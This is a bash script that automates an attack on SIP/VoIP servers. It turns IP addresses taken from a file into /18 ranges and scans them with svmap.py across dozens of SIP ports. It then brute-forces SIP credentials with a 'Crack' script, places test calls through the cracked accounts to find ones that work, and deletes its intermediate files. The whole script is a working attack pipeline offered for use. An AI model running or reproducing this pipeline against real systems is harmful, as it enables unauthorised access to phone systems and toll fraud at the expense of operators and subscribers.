#!/bin/bash

grep -Po "([0-2]?\d?\d\.){3}[0-2]?\d?\d" cn > 1
cat 1 | perl -lane 'use warnings; use strict; for my $i (@F){if ($i =~/^(?:(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])\.)(?:(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])\.){2}(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])$/) { print $i; } }' > 2
awk '!a[$0]++' 2 >3
awk -F'.' '{print $1,$2}' OFS='.' 3 >4
awk '{print $0".0.0/18"}' 4 >5
awk '!a[$0]++' 5 >ip.txt
rm 5
rm 4
rm 3
rm 2
rm 1


# SIP scan

echo -e "\nStart SIP scan ...\n"

while read -r ip; do
	echo "Checking $ip";
	sudo python svmap.py $ip -v -p5060,6072,6073,7073,6069,6079,6099,6089,5059,5260,5061,5070,5069,6655,5038,5080,5062,15060,6050,6051,5063,5064,5065,5067,5068,5071,5072,5073,5076,5075,5077,5078,1020,5079,1021,1022,1023,6052,6053,6054,6055,6057,6058,6059,6061,6062,6063,6070,6064,6080,6010,5090,5566,9060,4002,5678,5088,6020,5600,5160,1025,9090,5506,6060 -t0.0 >> output.txt
done < ip.txt

grep -Po "(\d+\.){3}\d+:?(\d?){7}" output.txt >>1
grep -R ':' 1 >2
awk '!a[$0]++' 2 >IPS
sudo rm 1
sudo rm 2
echo -e "\nEnding scan !\n"
sleep 1

# SIP Responses

echo -e "\nStart SIP Responses ...\n"

perl run IPS
cat 401.pal 403.pal 404.pal >> ipSIP
sleep 3

echo -e "\nEnding SIP Responses !\n"

# SIP Crack

echo -e "\nStart SIP Crack ...\n"

perl Crack 50 2 ipSIP
sudo rm IPS # remove the file
sudo rm *.pal # remove the file
sudo rm ipSIP # remove the file
sleep 3
echo -e "\nEnding SIP crack !\n"

# Testing SIP prefix

echo -e "\nStart Testing ...\n"

perl call VOIPresult 30 20 | tee callfile1
grep -R 'MOHAMMAD' callfile1 >callfile2
cat callfile2 | awk '{print $2,$3,$4,$5,$6}' > QWEASD.txt
awk '!a[$0]++' QWEASD.txt >successCALL.txt
sudo rm callfile1
sudo rm callfile2
sudo rm QWEASD.txt
sleep 2

sleep 5

echo -e "\nEnding crack !\n"
echo -e "\nby Mohammad Elnwajha\n"
